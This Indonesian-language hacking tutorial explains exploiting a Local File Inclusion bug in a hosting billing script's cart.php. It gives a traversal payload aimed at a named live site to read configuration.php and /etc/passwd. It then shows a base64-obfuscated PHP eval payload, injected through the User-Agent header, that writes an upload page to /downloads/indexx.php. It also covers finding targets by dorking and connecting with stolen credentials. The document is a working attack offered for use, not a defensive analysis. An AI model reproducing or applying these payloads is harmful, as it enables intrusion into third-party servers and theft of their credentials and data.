Ada yang tau apa itu LFI ??
kalo yg belum saya akan menjelaskan sedikit apa itu LFI .
LFI a.k.a Local File Inclusion adalah sebuah bug dimana kita bisa mengexploitnya hanya dengan melalui URL, dan memanfaatkan segala cara untuk bisa mengakses Web tersebut.
Oke langsung saja ke POCnya :
1. Biasalah cari target dengan dork, dorknya sama kaya yang submitticket hanya rubah ja nanti dengan exploitnya.
2. Misalnya saya punya target yang sudah Vuln :
Di atas kita hanya memanfaatkan memalui cart.php atau bisa juga dengan yg lain nya , yg memiliki kerentanan.
3. Kemudian masukkan exploit LFI :
cart.php?a=syndrom&templatefile=../../../configuration.php
Sehingga misalnya kita contohkan seperti ini, :
http://www.nethosting.freeiz.com/clientes/cart.php?a=syndrom&templatefile=../../../configuration.php
4. Liat Source Web tersebut dengan menekan Ctrl+u , scroll kebawah dan lihat disana ada configuration webnya :D. asikk
Bagaimana cara mengkonekan nya :/
5.Ada beberapa cara untuk mengkonekan Configuration tersebut :
- Menggunakan ftp
- Menggunakan navicat for mysql
- Filezilla
- Menggunakan armitage ( bila anda menggunakan backtrack / blackbuntu ).
Anda tidak bisa mengkonekan sembarangan dengan port default, tentunya kita harus mengetahui port yang terbuka terlebih dahulu, untuk bisa mengakses semua Filenya, ada beberapa cara juga untuk mengecek portnya, diantaranya bisa menggunakan nmap bisa juga memakai port scanner yg ada di shell :D.
Ada Cara kedua selain mengkonekan dengan cara tersebut.
Caranya dengan menggunakan tamper data.
1. Install Dulu addons tamper data yg ada di mozilla
2. Setelah di install , kita cek /etc/passwdnya :
Kalo muncul , otomatis /proc/self/environ nya pun muncul, kita lihat muncul tidak :
3. Kemudian buka tamper lalu refresh , Klik tamper.. jangan Submit ataupun Cancel pastinya ;)
Disitu ada kolom User Agent, hapus tulisan yang Mozilla blablabla lalu ganti dengan :
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJ aUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWe UlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMm w2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZ YQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa 2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYn lBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigiZG9 3bmxvYWRzL2luZGV4eC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTs=')) ;{/php})
Lalu ok, setelah proses tamper selsai, lalu kita cek apakah muncul tempat upload ??
/downloads/indexx.php << adalah path yang ada di exploit tersebut. ;)